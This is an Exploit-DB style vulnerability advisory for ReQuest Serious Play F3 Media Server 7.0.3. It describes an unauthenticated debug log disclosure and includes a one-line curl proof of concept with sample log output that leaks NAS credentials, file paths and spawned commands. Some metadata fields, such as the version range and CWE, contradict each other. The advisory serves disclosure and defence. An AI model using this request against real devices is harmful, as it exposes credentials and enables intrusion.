ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure

vendor:

ReQuest Serious Play F3 Media Server

by:

LiquidWorm

8.8

CVSS

HIGH

Debug Log Disclosure

200

CWE

Product Name: ReQuest Serious Play F3 Media Server

Affected Version From: 7.0.3.4968 (Pro)

Affected Version To: 2.0.1.823

Patch Exists: YES

Related CWE: N/A

CPE: a:request:serious_play_f3_media_server

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: ReQuest Serious Play® OS v7.0.1, ReQuest Serious Play® OS v6.0.0, Debian GNU/Linux 5.0, Linux 3.2.0-4-686-pae, Linux 2.6.36-request+lenny.5, Apache/2.2.22, Apache/2.2.9, PHP/5.4.45, PHP/5.2.6-1

2020

ReQuest Serious Play F3 Media Server 7.0.3 – Debug Log Disclosure

The unprotected web management server is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit the message_log page and disclose the webserver's Python debug log file containing system information, credentials, paths, processes and command arguments running on the device.

Mitigation:

Ensure that the web management server is properly secured and access to the message_log page is restricted.

Source

Exploit-DB raw data:

# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0

ReQuest Serious Play F3 Media Server 7.0.3 Debug Log Disclosure


Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 7.0.3.4968 (Pro)
                  7.0.2.4954
                  6.5.2.4954
                  6.4.2.4681
                  6.3.2.4203
                  2.0.1.823

Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
into a compact powerhouse. With the ability to add unlimited NAS devices, the
F3 can handle your entire family's media collection with ease.

Desc: The unprotected web management server is vulnerable to sensitive information
disclosure vulnerability. An unauthenticated attacker can visit the message_log
page and disclose the webserver's Python debug log file containing system information,
credentials, paths, processes and command arguments running on the device.

Tested on: ReQuest Serious Play® OS v7.0.1
           ReQuest Serious Play® OS v6.0.0
           Debian GNU/Linux 5.0
           Linux 3.2.0-4-686-pae
           Linux 2.6.36-request+lenny.5
           Apache/2.2.22
           Apache/2.2.9
           PHP/5.4.45
           PHP/5.2.6-1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2020-5600
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5600.php


01.08.2020

--


$ curl http://192.168.1.17/message_log

...
...
Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1590039696]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
Oct 14 09:17:05 [debug] mediaman[pid 3635, tid -1581646992]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000002/.request/upload
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1403303056]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000003/.request/upload
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1610613904]: (mediaman.py/11576) Message Response (mrespgetdir): /fat32/c/upload
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1619006608]: (mediaman.py/11576) Message Response (mrespgetdir): Failed - no such directory
Oct 14 09:17:06 [debug] mediaman[pid 3635, tid -1285805200]: (mediaman.py/11576) Message Response (mrespgetdir): /MP3/NAS000000001/.request/upload
Oct 14 09:17:36 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
Oct 14 09:17:48 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
Oct 14 09:19:19 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3110) Mount NAS: /home/arq/bin/mountnas.py -n 3 '192.168.1.17' 'Movies' -u 'admin' -p 'zePassw0rd' 2>/dev/null
Oct 14 09:19:32 [debug] discodaemon[pid 3635, tid -1294197904]: (discodaemon.py/3113) Mount NAS verify: df /MP3/NAS000000003 2>/dev/null
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.397037 ('Update News Feed'): /home/arq/bin/widget/news_feed.py
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.401558 ('Update Stock Feed'): /home/arq/bin/widget/stock_feed.py
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/181) Skipping a command ('Check if squeezeplay was properly started'); condition doesn't match
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.408094 ('Probe for CP2101'): /home/arq/bin/cp2101_probe.sh
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.409664 ('Update Weather Feed'): /home/arq/bin/widget/weather_feed.py
Oct 14 09:20:25 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681625.413391 ('Check for Network Configuration changes'): /home/arq/bin/check_netconf.sh
Oct 14 09:20:25 [warning] BrowserProtocolClient_15[pid 11532, tid -1544549520]: (pandoralist.py/282) No Pandora user configured.
Oct 14 09:20:35 [debug] scheduler[pid 12089, tid -1285543056]: (schedule.py/177) Spawning a command at 1602681635.425757 ('Ask all currently-attached IMCs to answer a rollcall'): /home/arq/bin/imcRollcall.sh
Oct 14 09:20:35 [debug] ini[pid 12089, tid -1251767440]: (iniengine.py/621) Setting MPP30345_STATUS:Rollcall to 1602681635.45
...
...